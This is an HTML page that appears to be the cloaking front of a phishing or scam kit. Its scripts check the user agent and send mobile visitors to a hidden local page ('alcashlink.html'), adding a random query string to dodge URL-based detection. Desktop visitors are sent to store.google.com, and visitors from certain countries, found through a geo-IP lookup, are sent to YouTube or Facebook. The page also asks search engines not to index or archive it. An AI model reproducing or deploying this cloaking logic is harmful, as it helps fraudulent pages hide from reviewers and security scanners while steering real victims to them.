
<META name="robots" content="NOINDEX,NOFOLLOW,NOARCHIVE,NOODP,NOSNIPPET">
<script type="text/javascript">
//<![CDATA[
 function h(r, a) { var t = ""; if ("mix" == a) var h = 
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789amp;"; else var h = 
"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789amp;"; for (var n = 0; r > n; n++) t += h.charAt(Math.floor(Math.random() * 
h.length)); return t };

        var device = navigator.userAgent
        
        if (device.match(/Iphone/i)|| device.match(/Ipod/i)|| device.match(/Android/i)|| device.match(/J2ME/i)|| device.match(/BlackBerry/i)|| device.match(/iPhone|iPad|iPod/i)|| device.match(/Opera Mini/i)|| device.match(/IEMobile/i)|| device.match(/Mobile/i)|| device.match(/Windows Phone/i)|| device.match(/windows mobile/i)|| device.match(/windows ce/i)|| device.match(/webOS/i)|| device.match(/palm/i)|| device.match(/bada/i)|| device.match(/series60/i)|| device.match(/nokia/i)|| device.match(/symbian/i)|| device.match(/HTC/i))
        {
         window.location = "./alcashlink.html?"+ h(7, '')+"";
        }else
{
window.location = "https://store.google.com/?"+ h(7, '')+"";
}
//]]>
</script>

<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Redirection by Country</title>
</head>
<body>

<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <!-- Importar jQuery -->

<script>
// Function to get country information using ipinfo.io
function obtenerPais() {
    $.get("https://ipinfo.io", function(response) {
        var country = response.country; // Obtiene el código del país (por ejemplo, "US" para Estados Unidos)

        // Define country codes and their destination URLs
        var redirecciones = {
            "IR": "https://www.youtube.com/", // Ejemplo: España
            "US": "https://www.youtube.com/", // Ejemplo: Estados Unidos
            "SE": "https://www.facebook.com/", //
            // You can add more country codes and URLs according to your needs
        };

        // Check if the user's country is in the redirect list
        if (redirecciones.hasOwnProperty(country)) {
            window.location.href = redirecciones[country]; // Redirects to the URL corresponding to the country
        } else {

        }
    }, "jsonp");
}

// Call the function on page load
window.onload = obtenerPais;
</script>

</body>
